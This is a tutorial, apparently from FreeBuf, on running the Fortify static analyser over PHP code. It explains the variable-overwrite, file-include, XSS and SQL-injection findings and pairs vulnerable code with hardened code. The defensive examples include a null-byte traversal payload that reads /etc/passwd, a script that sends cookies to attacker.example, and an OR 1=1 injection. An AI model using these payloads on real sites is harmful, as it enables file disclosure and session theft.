Introduction to and Usage Analysis of the Commercial-Grade White-Box Tool Fortify

1. What is Fortify, and what can it do?

Answer: Its full name is Fortify SCA (Static Code Analyzer). It was an HP product at the time of writing, and it is a static, white-box source-code security testing tool. It runs five main built-in analysis engines (data flow, semantic, structural, control flow and configuration) over an application's source code, matches what they find against its own software-security vulnerability rule set, and in that way locates the security flaws in the source and produces an organised report.

2. How many languages does it support?

Answer: Fortify SCA supports 21 languages:

1. ASP.NET
2. VB.NET
3. C#.NET
4. ASP
5. VBScript
6. VS6
7. Java
8. JSP
9. JavaScript
10. HTML
11. XML
12. C/C++
13. PHP
14. T-SQL
15. PL/SQL
16. ActionScript
17. Objective-C (iPhone, 2012/5)
18. ColdFusion 5.0 (optional add-on)
19. Python (optional add-on)
20. COBOL (optional add-on)
21. SAP ABAP (optional add-on)

3. Is it free?

Answer: No, it is a paid product, and there is no cracked version floating around online either. It reportedly costs around 100,000 yuan a month.

4. How do you use it?

After installing Fortify, open it.

Main interface (screenshot in the original).

Choose Advanced Scan.

It asks whether you want to update. I chose No, because this is my own copy: I bought a one-month trial in July 2015 and was afraid it would stop working after an update. If you have bought a licence you can choose Yes.

After that choice the following screen appears (screenshot in the original).

Browse selects the path where the scan results will be saved.

Then click Next.

Parameter explanation:

enable clean: clears the results of the previous scan. Unless you switch to a different build ID, leftover intermediate files may affect the next scan.
enable translation: translation, i.e. converting the source code into NST files.
-64: scan in 64-bit mode; SCA scans in 32-bit mode by default.
-Xmx4000m: sets the JVM heap; 4000M is roughly 4G. -Xmx4G also works, since the parameter accepts G as a unit. Recommended.
-encoding: sets the source character set. UTF-8 covers the most, and telling the tool which character set to convert from while parsing the code works best. Recommended; without it, Chinese comments show up as garbage.
-disable-source-rendering: does not load code unrelated to findings into the audit workbench. Not recommended, because the code display then becomes incomplete.

Then click Next.

It asks: is this a J2EE web application?

Choose No (because you are scanning PHP).

Then click Scan to start the scan.

The progress dialog offers Always run in background, Run in background, Cancel and Details.

After the scan, the findings grouped by OWASP Top 10 (2013) category:

None (other): 1
A1 Injection: 7
A3 Cross-Site Scripting (XSS): 37
A4 Insecure Direct Object References: 35
A6 Sensitive Data Exposure: 4
A10 Unvalidated Redirects and Forwards: 2

If the interface is in English and you want to switch it to Chinese, do the following (screenshot in the original).

Below is the analysis diagram provided on the official site (image in the original).

Analysing the findings:

The "None" finding:

This is a variable variable, which Chinese speakers usually call "variable overwrite" (变量覆盖).

The principle behind this flaw:

Variable variables

<?php
$first = "hello";
$hello = "world";
echo $first . " " . $$first;

The result is hello world.

$$first is $hello, because the value of $first is hello.

But inside a foreach it is different:

<?php
$a = 'sss';
foreach ($_GET as $key => $value) {
    // Inside a foreach this changes: read $$key as $ applied to $key, and $key is the
    // parameter name. For http://www.com.com/demo.php?a=value the key is "a", so $$key is $a.
    echo $$key;
    $$key = $value;   // $a = value: the existing variable is replaced
}
echo '<hr>';
echo $a;
?>
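The following is an added example, not code from the original article, that puts the same foreach/$$key pattern inside a function which initialises an authorisation flag before importing request parameters, and shows an import that only copies the parameters the code expects. The parameter names, the $is_admin flag and the request array are constructed for the example; extract($_GET) and the old register_globals setting produce the same overwrite.

```php
<?php
// Added example, not from the original article. Shows how the foreach/$$key
// pattern lets a request overwrite variables initialised before the import,
// and an allowlist-based import that cannot collide with local state.
// The parameter names and the request array below are constructed.

// Vulnerable: every request key becomes a variable name in this scope, so
// state the application set itself ($is_admin) is replaced by client data.
function vulnerable_import(array $get): bool
{
    $is_admin = false;                  // decided by the application, not the user
    foreach ($get as $key => $value) {
        $$key = $value;                 // ?is_admin=1 executes as $is_admin = '1'
    }
    return (bool) $is_admin;
}

// Hardened: copy only the parameters this page expects, into an array keyed
// by name. Nothing the client sends can name a local variable.
function safe_import(array $get, array $expected): array
{
    $params = [];
    foreach ($expected as $name) {
        if (isset($get[$name]) && is_string($get[$name])) {
            $params[$name] = $get[$name];
        }
    }
    return $params;
}

// Constructed request: an ordinary page request with is_admin=1 appended,
// as $_GET would present it.
$request = ['page' => 'home', 'is_admin' => '1'];

var_dump(vulnerable_import($request));

$is_admin = false;
$params   = safe_import($request, ['page']);   // 'is_admin' is not expected, so it is dropped
var_dump($is_admin, $params);
```

Run from the command line, the first var_dump shows the client-supplied flag winning inside vulnerable_import, while after safe_import the local $is_admin is untouched and $params contains only the page name. The point of the hardened form is that request data lands in an array you index by name, never in the symbol table.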

A1 Injection findings:

The $c variable turns out to be controlled by the client through a GET request.

The safe_replace function filters the following characters:

function safe_replace($string) {
    $string = str_replace('%20', '', $string);
    $string = str_replace('%27', '', $string);
    $string = str_replace('%2527', '', $string);
    $string = str_replace('*', '', $string);
    $string = str_replace('"', '&quot;', $string);
    $string = str_replace("'", '', $string);
    $string = str_replace('"', '', $string);
    $string = str_replace(';', '', $string);
    $string = str_replace('<', '&lt;', $string);
    $string = str_replace('>', '&gt;', $string);
    $string = str_replace("{", '', $string);
    $string = str_replace('}', '', $string);
    $string = str_replace('//', '', $string);
    return $string;
}

include $c . ".php";   the .php is appended afterwards by concatenation.

However, if the PHP version is below 5.3.4, a null byte (%00 in the URL) is treated as the end of the string, which is what people call truncation: everything after it, including the appended .php, is dropped. Note that the filter above never removes "\0", "." or a single "/", so a value such as ../../etc/passwd%00 passes through it unchanged.
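Below is an added example, not code from the original article or from phpcms, that shows why a safe_replace-style filter does not protect the include, and replaces the path concatenation with an allowlist lookup. The page names, the temporary base directory and the request values are constructed for the example; the filter function is a stand-in that drops the same characters as the function quoted above.

```php
<?php
// Added example, not from the original article or phpcms. Shows why a filter
// like safe_replace() does not protect `include $c . ".php"`, and replaces
// the path concatenation with an allowlist lookup. The page names, the base
// directory and the request values below are constructed for the example.

// Stand-in for the article's filter: quotes, brackets, semicolons and "//"
// are removed, but ".", a single "/" and the null byte pass through.
function filter_like_safe_replace(string $s): string
{
    $drop = ['%20', '%27', '%2527', '*', "'", '"', ';', '<', '>', '{', '}', '//'];
    return str_replace($drop, '', $s);
}

// Vulnerable: the filtered value is still used as a path. "../" survives, and
// on PHP < 5.3.4 a trailing "\0" makes include stop reading before ".php".
function vulnerable_include_target(string $c): string
{
    return filter_like_safe_replace($c) . '.php';
}

// Hardened: the request value selects an entry in a fixed table; it is never
// part of a path. Unknown names are rejected instead of defaulting.
const PAGES = ['home' => 'home.php', 'about' => 'about.php'];

function resolve_page(string $c, string $base): string
{
    if (!array_key_exists($c, PAGES)) {
        throw new InvalidArgumentException('unknown page');
    }
    $path = realpath($base . DIRECTORY_SEPARATOR . PAGES[$c]);
    $root = realpath($base);
    // Defence in depth: even a bad table entry cannot escape the base directory.
    if ($path === false || $root === false || strpos($path, $root . DIRECTORY_SEPARATOR) !== 0) {
        throw new RuntimeException('page not found');
    }
    return $path;
}

// Constructed fixture: a temporary pages directory with one real page.
$base = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'pages_' . bin2hex(random_bytes(4));
mkdir($base);
file_put_contents($base . DIRECTORY_SEPARATOR . 'home.php', "<?php echo 'home';\n");

// $_GET['c'] after PHP's own URL decoding: "%00" has already become "\0".
$inputs = ['home', "../../../../etc/passwd\0"];

foreach ($inputs as $c) {
    printf("request %s\n", json_encode($c));
    printf("  filter + concat -> %s\n", json_encode(vulnerable_include_target($c)));
    try {
        printf("  allowlist       -> %s\n", resolve_page($c, $base));
    } catch (Exception $e) {
        printf("  allowlist       -> rejected (%s)\n", $e->getMessage());
    }
}

unlink($base . DIRECTORY_SEPARATOR . 'home.php');
rmdir($base);
```

The traversal input comes out of the filter with its "../" segments and the null byte intact, so the only thing standing between it and /etc/passwd on an old interpreter is the appended ".php", which the null byte removes. The allowlist version never builds a path from the request at all, and the realpath check catches a mis-edited table before it can point outside the pages directory.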

A3 XSS findings

$field_sql = "update " . DB_PRE . "member set {$field_sql} where userid={$last_id}";
$query = $this->mysql->query($field_sql);

Nothing constrains the value when it is written to the database, and nothing escapes it when it is output, so it goes straight onto the page and XSS results. (I won't go through each instance.) The same statement also builds its SET clause and row selector by string interpolation, so it is worth checking for SQL injection as well.
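The following is an added example, not code from the original article or from phpcms, that reproduces both halves of the stored XSS just described with an in-memory SQLite database: a profile field written through an interpolated UPDATE and echoed into HTML unescaped, followed by the same operations with a fixed statement, bound values and output encoding. The member table, its columns, the attacker payload and the row selector are constructed for the example.

```php
<?php
// Added example, not from the original article or phpcms. Reproduces the two
// halves of the stored XSS described above with an in-memory SQLite database:
// a profile field written through an interpolated UPDATE and echoed into HTML
// unescaped, then the same operations with a fixed statement, bound values and
// output encoding. The member table, its columns and the payload are constructed.

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE member (userid INTEGER PRIMARY KEY, nickname TEXT, email TEXT)');
$db->exec("INSERT INTO member (userid, nickname, email) VALUES (1, 'alice', 'a@example.test')");
$db->exec("INSERT INTO member (userid, nickname, email) VALUES (2, 'bob', 'b@example.test')");

// Vulnerable write, shaped like the article's
// "update member set {$field_sql} where userid={$last_id}": both fragments are
// interpolated, so the SET clause and the row selector come from the caller.
function vulnerable_update(PDO $db, string $field_sql, string $last_id): void
{
    $db->exec("UPDATE member SET {$field_sql} WHERE userid={$last_id}");
}

// Vulnerable read: the stored value is dropped into the page as-is, so any
// markup saved above runs in every visitor's browser.
function vulnerable_render(string $nickname): string
{
    return "<p>Welcome, {$nickname}</p>";
}

// Hardened write: the column comes from an allowlist and the value and id are
// bound parameters, so the SQL text is fixed before user data is involved.
function safe_update(PDO $db, string $column, string $value, int $userid): void
{
    if (!in_array($column, ['nickname', 'email'], true)) {
        throw new InvalidArgumentException('column not updatable');
    }
    $stmt = $db->prepare("UPDATE member SET {$column} = :v WHERE userid = :id");
    $stmt->execute([':v' => $value, ':id' => $userid]);
}

// Hardened read: encode for the HTML body context at the point of output.
function safe_render(string $nickname): string
{
    return '<p>Welcome, ' . htmlspecialchars($nickname, ENT_QUOTES | ENT_HTML5, 'UTF-8') . '</p>';
}

function nickname(PDO $db, int $userid): string
{
    $stmt = $db->prepare('SELECT nickname FROM member WHERE userid = :id');
    $stmt->execute([':id' => $userid]);
    return (string) $stmt->fetchColumn();
}

// Constructed attacker input: a script payload as the new nickname, and a
// row selector that was meant to be "1" but carries an OR clause.
$payload = '<script>document.location="https://attacker.example/?c="+document.cookie</script>';

vulnerable_update($db, "nickname='" . $payload . "'", '1 OR 1=1');   // the OR clause hits every row
echo "unescaped : ", vulnerable_render(nickname($db, 2)), "\n";     // bob's page now carries the script
echo "escaped   : ", safe_render(nickname($db, 2)), "\n";            // same data, rendered as text

safe_update($db, 'nickname', $payload, 1);                           // stored verbatim, harmless once escaped on output
try {
    safe_update($db, "nickname='x' WHERE 1=1 --", 'y', 1);           // column allowlist rejects the injected clause
} catch (InvalidArgumentException $e) {
    echo "rejected  : ", $e->getMessage(), "\n";
}
```

Two things the example makes visible that the one-line finding does not: the interpolated WHERE lets a single request rewrite every member's nickname, and the stored payload only becomes a vulnerability at the point of output, so the fix belongs in the rendering code (htmlspecialchars for the HTML context) rather than in a strip-on-input filter like safe_replace.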

A4 Insecure Direct Object References findings

There is no policy limiting the number of file uploads, which can be abused.

A6 Sensitive Data Exposure findings (screenshot in the original).

A10 Unvalidated Redirects and Forwards findings (screenshot in the original).

I won't go and track down who calls this function here; anyone who knows a bit of PHP will understand.

That is basically the whole process, but one thing I want to remind you of: if you do not set the memory yourself, it sets it automatically. If your machine has 8G of RAM it will set 8G, take all 8G, and leave your computer stuttering. Remember to set the memory before the next scan; on an 8G machine 7G is fine, and the remaining 1G is enough for some 4399 mini-games. ~_~

* Contributed by: 心东. Reposts must credit FreeBuf (FreeBuf.COM).
